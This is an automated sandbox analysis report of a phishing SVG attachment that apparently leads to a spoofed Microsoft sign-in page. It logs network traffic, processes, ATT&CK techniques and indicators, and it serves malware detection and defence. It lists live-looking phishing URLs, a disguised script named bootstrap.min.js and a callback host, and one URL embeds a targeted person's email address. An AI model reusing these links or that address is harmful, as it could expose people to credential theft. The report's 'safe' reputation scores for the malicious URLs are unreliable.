        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5739350082.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5739350082.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: ajhds.myhaetsinks.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: 5739350082-1317754460.cos.ap-singapore.myqcloud.com
        Source: global trafficDNS traffic detected: DNS query: 5739350082.sbs
        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
        Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3401sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwmcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49698 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49747 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7016_677535273
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7016_677535273
        Source: classification engineClassification label: mal64.phis.winSVG@22/15@39/259
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\TRANS_ADV_9290910137_.svg
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,17266258622726128370,13840176397615438204,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,17266258622726128370,13840176397615438204,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions        		1
        Process Injection        		1
        Masquerading        		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Extra Window Memory Injection        		1
        Process Injection        		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        File Deletion        		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Extra Window Memory Injection        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        TRANS_ADV_9290910137_.svg0%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=926055dbacd31b53&lang=auto0%Avira URL Cloudsafe
        https://ajhds.myhaetsinks.com/TAael?e=benny@wcctxlaw.com0%Avira URL Cloudsafe
        https://ajhds.myhaetsinks.com/TAael/?e=benny@wcctxlaw.com0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwm0%Avira URL Cloudsafe
        https://5739350082-1317754460.cos.ap-singapore.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
        https://5739350082.sbs/google.php0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/926055dbacd31b53/1742925917178/0f5b33a5f729114e5db2bf2e77931538eec6cd5aa59bd8c789a7df2b94be4fe7/nM2WkquA55gah7Z0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QX0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        mailmeteor.com
        		172.67.187.19
        		truefalse
          		high
          stackpath.bootstrapcdn.com
          		104.18.10.207
          		truefalse
            		high
            s-part-0012.t-0009.t-msedge.net
            		13.107.246.40
            		truefalse
              		high
              sgp.file.myqcloud.com
              		43.152.64.207
              		truefalse
                		high
                e329293.dscd.akamaiedge.net
                		23.209.72.31
                		truefalse
                  		high
                  maxcdn.bootstrapcdn.com
                  		104.18.11.207
                  		truefalse
                    		high
                    5739350082.sbs
                    		69.49.245.67
                    		truefalse
                      		unknown
                      code.jquery.com
                      		151.101.194.137
                      		truefalse
                        		high
                        cdnjs.cloudflare.com
                        		104.17.24.14
                        		truefalse
                          		high
                          challenges.cloudflare.com
                          		104.18.94.41
                          		truefalse
                            		high
                            e1315.dsca.akamaiedge.net
                            		23.56.162.51
                            		truefalse
                              		high
                              resc.cloudinary.com.cdn.cloudflare.net
                              		104.17.202.1
                              		truefalse
                                		high
                                www.google.com
                                		142.251.35.164
                                		truefalse
                                  		high
                                  ajhds.myhaetsinks.com
                                  		172.67.131.98
                                  		truefalse
                                    		unknown
                                    res.cloudinary.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      aadcdn.msftauth.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        5739350082-1317754460.cos.ap-singapore.myqcloud.com
                                        		unknown
                                        		unknownfalse
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://5739350082.sbs/google.phpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                            		high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/926055dbacd31b53/1742925917178/0f5b33a5f729114e5db2bf2e77931538eec6cd5aa59bd8c789a7df2b94be4fe7/nM2WkquA55gah7Zfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                              		high
                                              https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                		high
                                                https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                  		high
                                                  https://ajhds.myhaetsinks.com/TAael/?e=benny@wcctxlaw.comfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                    		high
                                                    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                      		high
                                                      https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                        		high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwmfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                          		high
                                                          https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                            		high
                                                            https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                              		high
                                                              https://5739350082-1317754460.cos.ap-singapore.myqcloud.com/bootstrap.min.jsfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=926055dbacd31b53&lang=autofalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QXfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ajhds.myhaetsinks.com/TAael?e=benny@wcctxlaw.comfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.18.10.207
                                                              		stackpath.bootstrapcdn.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              13.107.246.40
                                                              		s-part-0012.t-0009.t-msedge.netUnited States
                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                              172.67.131.98
                                                              		ajhds.myhaetsinks.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              172.67.187.19
                                                              		mailmeteor.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              104.18.94.41
                                                              		challenges.cloudflare.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              142.251.40.202
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              142.250.80.67
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              142.250.65.238
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              23.56.162.51
                                                              		e1315.dsca.akamaiedge.netUnited States
                                                              		16625AKAMAI-ASUSfalse
                                                              151.101.194.137
                                                              		code.jquery.comUnited States
                                                              		54113FASTLYUSfalse
                                                              23.209.72.31
                                                              		e329293.dscd.akamaiedge.netUnited States
                                                              		20940AKAMAI-ASN1EUfalse
                                                              142.251.35.174
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              104.17.24.14
                                                              		cdnjs.cloudflare.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              23.209.72.9
                                                              		unknownUnited States
                                                              		20940AKAMAI-ASN1EUfalse
                                                              142.250.72.106
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              1.1.1.1
                                                              		unknownAustralia
                                                              		13335CLOUDFLARENETUSfalse
                                                              104.18.95.41
                                                              		unknownUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              104.18.11.207
                                                              		maxcdn.bootstrapcdn.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              142.251.40.142
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              142.251.167.84
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              142.251.40.99
                                                              		unknownUnited States
                                                              		15169GOOGLEUSfalse
                                                              104.17.202.1
                                                              		resc.cloudinary.com.cdn.cloudflare.netUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              142.251.35.164
                                                              		www.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              43.152.64.207
                                                              		sgp.file.myqcloud.comJapan4249LILLY-ASUSfalse
                                                              69.49.245.67
                                                              		5739350082.sbsUnited States
                                                              		46606UNIFIEDLAYER-AS-1USfalse

                                                              Private

                                                              IP
                                                              192.168.2.16

                                                              General Information

                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1648348
                                                              Start date and time:2025-03-25 19:04:42 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:16
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • EGA enabled
                                                              Analysis Mode:stream
                                                              Analysis stop reason:Timeout
                                                              Sample name:TRANS_ADV_9290910137_.svg
                                                              Detection:MAL
                                                              Classification:mal64.phis.winSVG@22/15@39/259
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .svg
                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 142.250.65.238, 142.250.80.67, 142.251.35.174, 142.251.167.84, 142.251.40.238, 142.251.40.110, 142.250.80.46
                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: ajhds.myhaetsinks.com

                                                              Created / dropped Files

                                                              Chrome Cache Entry: 68

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):2309
                                                              Entropy (8bit):3.9533709859154516
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                              SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                              SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                              SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
